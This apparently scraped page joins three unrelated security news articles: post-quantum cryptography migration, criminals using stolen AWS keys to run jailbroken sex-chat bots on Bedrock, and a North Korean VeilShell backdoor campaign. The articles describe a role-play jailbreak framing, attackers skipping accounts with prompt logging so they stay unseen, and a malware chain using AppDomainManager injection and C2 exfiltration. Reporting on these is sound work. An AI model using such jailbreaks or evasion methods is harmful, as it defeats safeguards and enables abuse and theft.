Defense and government institutions have already begun integrating these algorithms into the security protocols of specific applications and services due to the long-term sensitivity of their data. Private companies have also kicked off initiatives. For instance, Apple is using Kyber to create post-quantum encryption in iMessage, while Amazon is using Kyber in AWS.

Large-scale proliferation of PQC is coming, as global standards bodies, such as 3GPP and IETF, have already begun incorporating them into the security protocols of future standards releases. For instance, the IETF-designed Transport Layer Security (TLS) and Extensible Authentication Protocol-Authentication and Key Agreement (EAP-AKA) — two of the most widely used protocols across 3GPP networks— will both incorporate PQC.

This kind of standardization is key for industries like telecommunications and Internet services, where hundreds of different companies are providing the different hardware, device, and software components of a network. Like any security protocol, PQC must be implemented consistently across all exposed elements in the network chain because any link that isn't quantum-safe will become the focal point of any data harvesting attack.

Over the next few years, we will see more and more PQC-enhanced products enter the market. At first, they will likely use hybrid approaches to security, using both classical and post-quantum encryption schemes, as Apple and Amazon have done. But as quantum-security technologies advance and are further tested in the market, PQC will likely replace classical asymmetric encryption methods.

Because asymmetric algorithms are largely used for secure communications between organizations or endpoints that may not have previously interacted, a significant amount of coordination in the ecosystem is needed. Such transitions are some of the most complicated in the tech industry and will require staged migrations.

**Ready for Q-Day**

PQC isn't the only way to protect against a quantum attack, as quantum threats will only increase in sophistication. It's vital to deploy a defense-in-depth strategy — one that includes physics-based solutions like preshared keys with symmetric distribution and quantum key distribution (QKD) — but PQC will be a powerful security tool.

Attention to interoperability will be key here, as crypto agility will ease the migration to pure quantum-safe algorithms in the future. Some companies are already leaning toward open source rather than proprietary code, which can help to avoid a bumpy upgrade path in future for security products. As well, this crypto agility will ensure that technologies being designed now for inclusion in next-generation/6G products will also have backward-compatibility with 5G and other earlier standards.

Now that we have the essential first algorithms to build our arsenal against quantum computing threats, the next steps for the ICT industry will be critical. They must adopt hybrid solutions now to combat harvest-now-decrypt-later attacks; embrace crypto agility, interoperability, and rigorous testing; and deploy a defense-in-depth strategy. By following this strategy, we will be well on track to ensuring our long-term security and saving the world from potential disaster when Q-Day comes.

**About the Author**

Senior Research Scientist, Nokia

Aritra Banerjee is a Senior Research Scientist in Nokia Standards leading quantum-safe standardization efforts. His research interests span cryptography, quantum technologies, security, privacy-preserving technologies, and machine learning trends.

What Communications Companies Need to Know Before Q-Day

Organizations that get relieved of credentials to their cloud environments can quickly find themselves part of a disturbing new trend: Cybercriminals using stolen cloud credentials to operate and resell sexualized AI-powered chat services. Researchers say these illicit chat bots, which use custom jailbreaks to bypass content filtering, often veer into darker role-playing scenarios, including child sexual exploitation and rape.

Organizations that get relieved of credentials to their cloud environments can quickly find themselves part of a disturbing new trend: Cybercriminals using stolen cloud credentials to operate and resell sexualized AI-powered chat services. Researchers say these illicit chat bots, which use custom jailbreaks to bypass content filtering, often veer into darker role-playing scenarios, including child sexual exploitation and rape.

Image: Shutterstock.

Researchers at security firm **Permiso Security** say attacks against generative artificial intelligence (AI) infrastructure like **Bedrock** from Amazon Web Services (AWS) have increased markedly over the last six months, particularly when someone in the organization accidentally exposes their cloud credentials or key online, such as in a code repository like **GitHub**.

Investigating the abuse of AWS accounts for several organizations, Permiso found attackers had seized on stolen AWS credentials to interact with the **large language models** (LLMs) available on Bedrock. But they also soon discovered none of these AWS users had enabled full logging of LLM activity (by default, logs don’t include model prompts and outputs), and thus they lacked any visibility into what attackers were doing with that access.

So Permiso researchers decided to leak their own test AWS key on GitHub, while turning on logging so that they could see exactly what an attacker might ask for, and what the responses might be.

Within minutes, their bait key was scooped up and used in a service that offers AI-powered sex chats online.

“After reviewing the prompts and responses it became clear that the attacker was hosting an AI roleplaying service that leverages common jailbreak techniques to get the models to accept and respond with content that would normally be blocked,” Permiso researchers wrote in a report released today.

“Almost all of the roleplaying was of a sexual nature, with some of the content straying into darker topics such as child sexual abuse,” they continued. “Over the course of two days we saw over 75,000 successful model invocations, almost all of a sexual nature.”

**Ian Ahl**, senior vice president of threat research at Permiso, said attackers in possession of a working cloud account traditionally have used that access for run-of-the-mill financial cybercrime, such as cryptocurrency mining or spam. But over the past six months, Ahl said, Bedrock has emerged as one of the top targeted cloud services.

“Bad guy hosts a chat service, and subscribers pay them money,” Ahl said of the business model for commandeering Bedrock access to power sex chat bots. “They don’t want to pay for all the prompting that their subscribers are doing, so instead they hijack someone else’s infrastructure.”

Ahl said much of the AI-powered chat conversations initiated by the users of their honeypot AWS key were harmless roleplaying of sexual behavior.

“But a percentage of it is also geared toward very illegal stuff, like child sexual assault fantasies and rapes being played out,” Ahl said. “And these are typically things the large language models won’t be able to talk about.”

AWS’s Bedrock uses large language models from **Anthropic**, which incorporates a number of technical restrictions aimed at placing certain ethical guardrails on the use of their LLMs. But attackers can evade or “jailbreak” their way out of these restricted settings, usually by asking the AI to imagine itself in an elaborate hypothetical situation under which its normal restrictions might be relaxed or discarded altogether.

“A typical jailbreak will pose a very specific scenario, like you’re a writer who’s doing research for a book, and everyone involved is a consenting adult, even though they often end up chatting about nonconsensual things,” Ahl said.

In June 2024, security experts at **Sysdig** documented a new attack that leveraged stolen cloud credentials to target ten cloud-hosted LLMs. The attackers Sysdig wrote about gathered cloud credentials through a known security vulnerability, but the researchers also found the attackers sold LLM access to other cybercriminals while sticking the cloud account owner with an astronomical bill.

“Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers: in this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted,” Sysdig researchers wrote. “If undiscovered, this type of attack could result in over $46,000 of LLM consumption costs per day for the victim.”

Ahl said it’s not certain who is responsible for operating and selling these sex chat services, but Permiso suspects the activity may be tied to a platform cheekily named “**chub\[.\]ai**,” which offers a broad selection of pre-made AI characters with whom users can strike up a conversation. Permiso said almost every character name from the prompts they captured in their honeypot could be found at Chub.

Some of the AI chat bot characters offered by Chub. Some of these characters include the tags “rape” and “incest.”

Chub offers free registration, via its website or a mobile app. But after a few minutes of chatting with their newfound AI friends, users are asked to purchase a subscription. The site’s homepage features a banner at the top that reads: “Banned from OpenAI? Get unmetered access to uncensored alternatives for as little as $5 a month.”

Until late last week Chub offered a wide selection of characters in a category called “**NSFL**” or Not Safe for Life, a term meant to describe content that is disturbing or nauseating to the point of being emotionally scarring.

_Fortune_ profiled Chub AI in a January 2024 story that described the service as a virtual brothel advertised by illustrated girls in spaghetti strap dresses who promise a chat-based “world without feminism,” where “girls offer sexual services.” From that piece:

> Chub AI offers more than 500 such scenarios, and a growing number of other sites are enabling similar AI-powered child pornographic role-play. They are part of a broader uncensored AI economy that, according to Fortune’s interviews with 18 AI developers and founders, was spurred first by OpenAI and then accelerated by Meta’s release of its open-source Llama tool.

Fortune says Chub is run by someone using the handle “**Lore**,” who said they launched the service to help others evade content restrictions on AI platforms. Chub charges fees starting at $5 a month to use the new chatbots, and the founder told Fortune the site had generated more than $1 million in annualized revenue.

KrebsOnSecurity sought comment about Permiso’s research from AWS, which initially seemed to downplay the seriousness of the researchers’ findings. The company noted that AWS employs automated systems that will alert customers if their credentials or keys are found exposed online.

AWS explained that when a key or credential pair is flagged as exposed, it is then restricted to limit the amount of abuse that attackers can potentially commit with that access. For example, flagged credentials can’t be used to create or modify authorized accounts, or spin up new cloud resources.

Ahl said Permiso did indeed receive multiple alerts from AWS about their exposed key, including one that warned their account may have been used by an unauthorized party. But they said the restrictions AWS placed on the exposed key did nothing to stop the attackers from using it to abuse Bedrock services.

Sometime in the past few days, however, AWS responded by including Bedrock in the list of services that will be quarantined in the event an AWS key or credential pair is found compromised or exposed online. AWS confirmed that Bedrock was a new addition to its quarantine procedures.

Additionally, not long after KrebsOnSecurity began reporting this story, Chub’s website removed its NSFL section. It also appears to have removed cached copies of the site from the Wayback Machine at archive.org. Still, Permiso found that Chub’s user stats page shows the site has more than 3,000 AI conversation bots with the NSFL tag, and that 2,113 accounts were following the NSFL tag.

The user stats page at Chub shows more than 2,113 people have subscribed to its AI conversation bots with the “Not Safe for Life” designation.

Permiso said their entire two-day experiment generated a $3,500 bill from AWS. Most of that cost was tied to the 75,000 LLM invocations caused by the sex chat service that hijacked their key.

Paradoxically, Permiso found that while enabling these logs is the only way to know for sure how crooks might be using a stolen key, the cybercriminals who are reselling stolen or exposed AWS credentials for sex chats have started including programmatic checks in their code to ensure they aren’t using AWS keys that have prompt logging enabled.

“Enabling logging is actually a deterrent to these attackers because they are immediately checking to see if you have logging on,” Ahl said. “At least some of these guys will totally ignore those accounts, because they don’t want anyone to see what they’re doing.”

In a statement shared with KrebsOnSecurity, AWS said its services are operating securely, as designed, and that no customer action is needed. Here is their statement:

> “AWS services are operating securely, as designed, and no customer action is needed. The researchers devised a testing scenario that deliberately disregarded security best practices to test what may happen in a very specific scenario. No customers were put at risk. To carry out this research, security researchers ignored fundamental security best practices and publicly shared an access key on the internet to observe what would happen.”
> 
> “AWS, nonetheless, quickly and automatically identified the exposure and notified the researchers, who opted not to take action. We then identified suspected compromised activity and took additional action to further restrict the account, which stopped this abuse. We recommend customers follow security best practices, such as protecting their access keys and avoiding the use of long-term keys to the extent possible. We thank Permiso Security for engaging AWS Security.”

AWS said customers can configure model invocation logging to collect Bedrock invocation logs, model input data, and model output data for all invocations in the AWS account used in Amazon Bedrock. Customers can also use CloudTrail to monitor Amazon Bedrock API calls.

The company said AWS customers also can use services such as GuardDuty to detect potential security concerns and Billing Alarms to provide notifications of abnormal billing activity. Finally, AWS Cost Explorer is intended to give customers a way to visualize and manage Bedrock costs and usage over time.

Anthropic told KrebsOnSecurity it is always working on novel techniques to make its models more resistant to jailbreaks.

“We remain committed to implementing strict policies and advanced techniques to protect users, as well as publishing our own research so that other AI developers can learn from it,” Anthropic said in an emailed statement. “We appreciate the research community’s efforts in highlighting potential vulnerabilities.”

Anthropic said it uses feedback from child safety experts at Thorn around signals often seen in child grooming to update its classifiers, enhance its usage policies, fine tune its models, and incorporate those signals into testing of future models.

**Update: 5:01 p.m. ET:** Chub has issued a statement saying they are only hosting the role-playing characters, and that the LLMs they use run on their own infrastructure.

“Our own LLMs run on our own infrastructure,” Chub wrote in an emailed statement. “Any individuals participating in such attacks can use any number of UIs that allow user-supplied keys to connect to third-party APIs. We do not participate in, enable or condone any illegal activity whatsoever.”

A Single Cloud Compromise Can Feed an Army of AI Sex Bots

Threat actors with ties to North Korea have been observed delivering a previously undocumented backdoor and remote access trojan (RAT) called VeilShell as part of a campaign targeting Cambodia and likely other Southeast Asian countries.
The activity, dubbed SHROUDED#SLEEP by Securonix, is believed to be the handiwork of APT37, which is also known as InkySquid, Reaper, RedEyes, Ricochet Chollima,

Cyber Espionage / Threat Intelligence

Threat actors with ties to North Korea have been observed delivering a previously undocumented backdoor and remote access trojan (RAT) called VeilShell as part of a campaign targeting Cambodia and likely other Southeast Asian countries.

The activity, dubbed **SHROUDED#SLEEP** by Securonix, is believed to be the handiwork of APT37, which is also known as InkySquid, Reaper, RedEyes, Ricochet Chollima, Ruby Sleet, and ScarCruft.

Active since at least 2012, the adversarial collective is assessed to be part of North Korea's Ministry of State Security (MSS). Like with other state-aligned groups, those affiliated with North Korea, including the Lazarus Group and Kimsuky, vary in their modus operandi and likely have ever-evolving objectives based on state interests.

A key malware in its toolbox is RokRAT (aka Goldbackdoor), although the group has also developed custom tools to facilitate covert intelligence gathering.

It's currently not known how the first stage payload, a ZIP archive bearing a Windows shortcut (LNK) file, is delivered to targets. However, it's suspected that it likely involves sending spear-phishing emails.

"The \[VeilShell\] backdoor trojan allows the attacker full access to the compromised machine," researchers Den Iuzvyk and Tim Peck said in a technical report shared with The Hacker News. "Some features include data exfiltration, registry, and scheduled task creation or manipulation."

The LNK file, once launched, acts as a dropper in that it triggers the execution of PowerShell code to decode and extract next-stage components embedded into it.

This includes an innocuous lure document, a Microsoft Excel or a PDF document, that's automatically opened, distracting the user while a configuration file ("d.exe.config") and a malicious DLL ("DomainManager.dll") file are written in the background to the Windows startup folder.

Also copied to the same folder is a legitimate executable named "dfsvc.exe" that's associated with the ClickOnce technology in Microsoft .NET Framework. The file is copied as "d.exe."

What makes the attack chain stand out is the use of a lesser-known technique called AppDomainManager injection in order to execute DomainManager.dll when "d.exe" is launched at startup and the binary reads the accompanying "d.exe.config" file located in the same startup folder.

It's worth noting that this approach was recently also put to use by the China-aligned Earth Baxia actor, indicating that it is slowly gaining traction among threat actors as an alternative to DLL side-loading.

The DLL file, for its part, behaves like a simple loader to retrieve JavaScript code from a remote server, which, in turn, reaches out to a different server to obtain the VeilShell backdoor.

VeilShell is a PowerShell-based malware that's designed to contact a command-and-control (C2) server to await further instructions that allow it to gather information about files, compress a specific folder into a ZIP archive and upload it back to the C2 server, download files from a specified URL, rename and delete files, and extract ZIP archives.

"Overall, the threat actors were quite patient and methodical," the researchers noted. "Each stage of the attack features very long sleep times in an effort to avoid traditional heuristic detections. Once VeilShell is deployed it doesn't actually execute until the next system reboot."

"The SHROUDED#SLEEP campaign represents a sophisticated and stealthy operation targeting Southeast Asia leveraging multiple layers of execution, persistence mechanisms, and a versatile PowerShell-based backdoor RAT to achieve long-term control over compromised systems."

Securonix's report comes a day after Broadcom-owned Symantec revealed that the North Korean threat actor tracked as Andariel targeted three different organizations in the U.S. in August 2024 as part of a financially motivated campaign.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#git